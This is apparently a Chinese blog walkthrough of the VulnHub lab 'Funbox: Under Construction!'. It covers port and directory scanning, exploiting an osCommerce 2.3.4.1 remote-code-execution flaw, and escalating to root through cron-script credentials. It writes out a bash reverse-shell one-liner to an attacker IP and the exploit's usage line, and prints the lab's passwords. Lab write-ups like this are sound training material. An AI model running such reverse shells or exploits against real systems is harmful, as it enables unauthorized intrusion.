准备:
攻击机:虚拟机kali、本机win10。
靶机:Funbox: Under Construction!,下载地址:https://download.vulnhub.com/funbox/Funbox10.ova,下载后直接vbox打开即可。
知识点:osCommerce框架漏洞、pspy64查看定时任务、敏感信息泄露。
信息收集:
通过nmap扫描下网段内的存活主机地址,确定下靶机的地址:nmap -sn 172.20.10.0/24,获得靶机地址:172.20.10.6。
扫描下端口对应的服务:nmap -T4 -sV -p- -A 172.20.10.6,显示开放了22、25、80、110、143端口,开启了ssh服务、http服务、smtp服务、pop3服务、imap服务。
目录扫描:
使用dirsearch进行目录扫描,发现catalog目录和一些其他文件、目录信息。
WEB信息收集:
访问下web服务:http://172.20.10.6/,并检查其源代码信息,但是未发现有效信息。
访问下扫描出来的目录:http://172.20.10.6/catalog,发现框架信息:osCommerce,版本信息:v2.3.4.1。
那就使用searchsploit搜索下osCommerce框架v2.3.4.1版本的漏洞信息,发现以下命令执行漏洞。
漏洞获取shell:
查看下该exp的利用方式,发现其利用方式为:python3 osCommerce2_3_4RCE.py http://localhost/oscommerce-2.3.4/catalog。
进行shell反弹时发现不能使用单引号字符,否则会终止rec_shell,尝试改成双引号成功反弹shell,命令:bash -c "bash -i >& /dev/tcp/172.20.10.7/6688 0>&1"。
提权:
在当前目录下的configure.php.bak文件中发现一组账户和密码:jack/yellow,但是切换该账户或ssh连接该账户均是失败。
上传pspy64并执行该脚本(赋予执行权限:chmod +x pspy64),发现会执行:/bin/sh -c /usr/share/doc/examples/cron.sh。
查看下该文件信息,命令:cat /usr/share/doc/examples/cron.sh,发现base64加密的字符串:LXUgcm9vdCAtcCByZnZiZ3QhIQ==,对该字符串解密,成功获得root账户信息:root/rfvbgt!!。
但是建立新的ssh连接,仍是无法直接连接,应该是配置中禁止了使用ssh协议+密码进行登录,使用python升级下shell:python -c 'import pty; pty.spawn("/bin/bash")',然后切换root账户:su root,成功获得root权限。
获得root权限后,在/root目录下发现root.txt文件,读取该文件成功获取到flag值。
标签:shell,10.6,FUNBOX,信息,172.20,CONSTRUCTION,vulnhub,root,ssh From: https://www.cnblogs.com/upfine/p/17044693.html